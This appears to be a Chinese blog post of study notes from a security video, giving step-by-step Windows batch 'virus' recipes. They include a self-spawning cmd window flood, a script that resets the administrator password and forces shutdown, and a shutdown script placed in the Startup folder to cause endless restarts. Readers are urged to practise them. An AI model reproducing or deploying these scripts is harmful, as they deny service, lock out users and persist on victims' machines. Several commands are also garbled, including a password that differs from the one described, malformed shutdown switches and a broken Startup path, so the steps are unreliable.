声明
学习视频来自B站UP主 泷羽sec,如涉及侵权马上删除文章 笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负
关于windows virus的那些事儿
- 一、Windows-Virus
- 资源耗尽之无限弹窗cmd-virus测试
- 锁机virus测试
- 无限重启virus测试
- 实践是检验真理的唯一标准
一、Windows-Virus
资源耗尽之无限弹窗cmd-virus测试
将start cmd命令写入到cmd.txt文件中
echo start cmd >cmd.txt
追加>>将%0写入到cmd.txt文件中
echo %0 >> cmd.txt
查看cmd.txt文件内容
type cmd.txt
重命名 cmd.txt文件更改未cmd.bat批处理文件
ren cdm.txt cmd.bat
执行cmd.bat文件
call c:\users\root cmd.bat
锁机virus测试
将net user administrator 123456写入到c:\windows\Temp\virus.bat批处理文件中
echo net user administrator syssys > c:\windows\Temp\text.txt
net user administrator 123456:更改用户administrator的password
将shutdown /s /t /f 0追加写入c:\windows\Temp\text.txt批处理文件中
echo shutdown /s /t /f 0 >> c:\windows\Temp\text.txt
注意:win7没有/n这个参数,这个/n是linux中的
shutdown /n /t 0:直接0s立即执行关闭主机
/n:这个选项是不调用 init 程序进行关机,而是由 shutdown 命令自己直接进行关机。
init 命令是 Unix 和类 Unix 操作系统(如 Linux)中的一个系统级命令,用于初始化系统或改变运行级别。
查看指定路径下的text.txt文件内容
type c:\windows\Temp\text.txt
切换到指定文件路径
cd c:\windows\Temp
重命令文件并更改格式txt为bat
ren text.txt test.bat
dir 查看路径c:\windows\Temp所有目录以及文件
缺点太过明显,需要指定路径才能运行,其次call文件需要等待上一个bat程序执行完才会执行,其次需要管理员权限运行cmd
使用新命令:新建cmd窗口执行bat,也多一个进程
cmd /c c:\windows\Temp\test.bat
这个登录的时候必须是超级管理员用户才会生效,使用其它权限用户依然可以登录,所以理论上成立,实际还需要更改为所有用户才行。
无限重启virus测试
写入立即执行关闭命令到my.bat
echo shutdown /s /t 0 > c:\windows\Temp\my.bat
用是将c:\windows\Temp目录下的my.bat文件复制到当前用户的启动文件夹中,使得每次计算机启动时,my.bat文件都会被执行。
copy c:\windows\Temp\my.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"
开机自启动目录
"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"
重启自动清空缓存测试
c:\windows\Temp\my.bat
好好好,看来限制是非常多,在win10中首先路径需要正确,其次需要有超级管理员的权限才可以。分享就到这里,下来实践。
还是那句话
